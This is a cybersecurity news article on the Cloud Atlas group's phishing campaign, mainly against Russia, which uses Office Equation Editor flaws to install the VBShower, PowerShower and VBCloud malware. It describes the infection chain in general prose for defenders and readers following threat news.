Cloud Atlas Targets Russia with VBCloud Malware

December 27, 2024

Cloud Atlas, also known as Clean Ursa, Inception, Oxygen, and Red October, has been implementing a previously unknown malware, VBCloud, in its cyber attack campaigns. The majority of the targets, over 80%, are in Russia. Other victims have been identified in Belarus, Canada, Moldova, Israel, Kyrgyzstan, Turkey, and Vietnam. This threat group has been active since 2014 and has been linked to cyber attacks in Russia, Belarus, and Transnistria. The method of infection is through phishing emails that contain a malicious document. This document exploits a vulnerability in the formula editor (CVE-2018-0802) to download and execute the malware. In December 2022, Cloud Atlas deployed a PowerShell-based backdoor called PowerShower. A year later, F.A.C.C.T, a Russian cybersecurity company, revealed that various entities in Russia were targeted by spear-phishing attacks that exploited an old Microsoft Office Equation Editor flaw (CVE-2017-11882) to drop a Visual Basic Script (VBS) payload responsible for downloading an unknown next-stage VBS malware. Kaspersky's recent report reveals that these components are part of VBShower, which is used to download and install PowerShower and VBCloud. The attack begins with a phishing email that contains a booby-trapped Microsoft Office document. When opened, it downloads a malicious template formatted as an RTF file from a remote server. It then exploits CVE-2018-0802 to fetch and run an HTML Application (HTA) file hosted on the same server. The VBShower backdoor retrieves more VBS payloads from the command-and-control server. It comes with capabilities to reboot the system, gather information about files in various folders, names of running processes, and scheduler tasks, and install PowerShower and VBCloud. PowerShower downloads and executes next-stage PowerShell scripts from the C2 server, and serves as a downloader for ZIP archive files. VBCloud utilizes a public cloud storage service for C2 communications. It collects information about disks, system metadata, files and documents with various extensions, and files related to the Telegram messaging app. The attack chain aims to steal data from victims' devices.

Related News

• Sidewinder APT Group Expands Geographic Reach in Latest Cyberattack Spree
• SideWinder Cyber Attacks Target Maritime Facilities Across Multiple Countries
• Kimsuky's TRANSLATEXT Chrome Extension: A New Tool for Data Theft
• Revived ValleyRAT Malware Exhibits Enhanced Data Theft Techniques
• Rise in USB-Based Cyberattacks on Operational Technology Systems

Latest News

• Palo Alto Networks Firewalls Targeted by Hackers Exploiting DoS Flaw
• Surge in Botnet Activity Targets D-Link Vulnerabilities: A Focus on FICORA and CAPSAICIN
• Adobe Issues Emergency Updates for Critical ColdFusion Flaw
• U.S. Court Delivers Verdict Against NSO Group in WhatsApp Spyware Case
• Apache Addresses Critical Vulnerability in Tomcat Web Server